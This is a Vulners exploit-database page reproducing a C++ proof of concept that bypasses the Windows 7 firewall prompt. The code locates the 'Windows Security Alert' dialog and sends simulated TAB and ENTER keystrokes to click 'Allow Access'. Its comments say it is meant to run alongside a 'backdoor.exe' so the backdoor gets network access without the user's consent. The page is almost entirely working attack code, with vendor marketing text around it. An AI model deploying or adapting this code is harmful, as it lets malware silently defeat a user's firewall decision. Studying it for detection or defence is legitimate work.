Vulners
Lucene search
Microsoft Windows Forced Firewall Bypass
`/*
A Proof of Concept how bypass windows firewall
Tested at windows 7
Author: Antonio Costa aka Cooler_, CoolerVoid
[email protected]
Greetz: M0nad, I4K, Slyfunky, Sigsegv, RaphaelSC, MMxM, F-117, Clandestine, LoganBr, Welias, Luanzeiro, Alan JUmpi...
This bypass the windows firewall, Search firewall GUI if found uses winapi to simulate keystroke tab, enter to allow access of firewall
Example:
g++ bypass_firewall.cpp -o bypass
Click in open at bypass.exe, leave program running
run backdoor.exe, wait the alert of firewall window appear, look the programm bypass.exe make the bypass at window!
*/
#define WINVER 0x0500
#include <string>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
using namespace std;
using std::string;
string GetActiveWindowTitle()
{
char wnd_title[256];
HWND hwnd=GetForegroundWindow();
GetWindowText(hwnd,wnd_title,sizeof(wnd_title));
return wnd_title;
}
BOOL CALLBACK EnumWindowsProc(HWND hwnd, LPARAM lParam)
{
char buffer[128];
int written = GetWindowTextA(hwnd, buffer, 128);
if (written && strstr(buffer,"Windows Security Alert") != NULL) // name of firewall GUI title
{
*(HWND*)lParam = hwnd;
return FALSE;
}
return TRUE;
}
HWND GetFirewall()
{
HWND hWnd = NULL;
EnumWindows(EnumWindowsProc, (LPARAM)&hWnd);
return hWnd;
}
int main()
{
short first=0;
PULLBACK:
HWND alertwindow = GetFirewall();
// detect firewall alert window...
if(BringWindowToTop(alertwindow))
{
INPUT ip;
DWORD dwCurrentThread = GetCurrentThreadId();
DWORD dwFGThread = GetWindowThreadProcessId(GetForegroundWindow(), NULL);
AttachThreadInput(dwCurrentThread, dwFGThread, TRUE);
SetForegroundWindow(alertwindow);
AttachThreadInput(dwCurrentThread, dwFGThread, FALSE);
SetForegroundWindow(alertwindow);
puts("\nBINGOOO\n");
Sleep(100); // you can change the wait time
SetForegroundWindow(alertwindow);
short x=6;
// press TAB six times to leave to Allow Acess button
while(x && first!=0)
{
ip.type = INPUT_KEYBOARD;
ip.ki.wScan = 0;
ip.ki.time = 0;
ip.ki.dwExtraInfo = 0;
ip.ki.wVk = 0x09; // virtual-key code of TAB
ip.ki.dwFlags = 0;
SendInput(1, &ip, sizeof(INPUT));
ip.ki.dwFlags = KEYEVENTF_KEYUP;
SendInput(1, &ip, sizeof(INPUT));
Sleep(100);
x--;
}
if(!x && first!=0)
{
// press ENTER at Allow Acess button
ip.type = INPUT_KEYBOARD;
ip.ki.wScan = 0;
ip.ki.time = 0;
ip.ki.dwExtraInfo = 0;
ip.ki.wVk = 0x0D; // virtual-key code of ENTER
ip.ki.dwFlags = 0;
SendInput(1, &ip, sizeof(INPUT));
ip.ki.dwFlags = KEYEVENTF_KEYUP;
SendInput(1, &ip, sizeof(INPUT));
}
first=1;
Sleep(150); // wait time
}
Sleep(200);
goto PULLBACK;
}
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Jun 2016 00:00Current
7.4High risk
Vulners AI Score7.4